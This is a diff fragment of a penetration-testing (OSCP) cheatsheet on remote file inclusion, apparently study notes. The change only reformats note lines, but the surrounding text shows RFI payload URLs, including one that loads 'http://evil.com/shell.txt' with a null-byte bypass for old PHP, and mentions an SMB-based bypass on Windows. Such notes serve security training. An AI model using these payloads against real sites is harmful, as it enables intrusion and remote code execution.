douglaskataki/oscp-report-notes/Cheatsheet - Machines.md

 http://example.com/index.php?page=http://$your_ip:$port/your_file.txt
 ```

-#note You will see some request in your web server.
+NOTE: You will see some request in your web server.
 ###### Null byte
 ```
 http://example.com/index.php?page=http://evil.com/shell.txt%00
 ```
-#note PHP version < 5.5 are vulnerable to this bypass
+NOTE: PHP version < 5.5 are vulnerable to this bypass
 ###### Bypass allow_url_include

 When `allow_url_include` and `allow_url_fopen` are set to `Off`.
 It is still possible to include a remote file on Windows box using the `smb` protocol.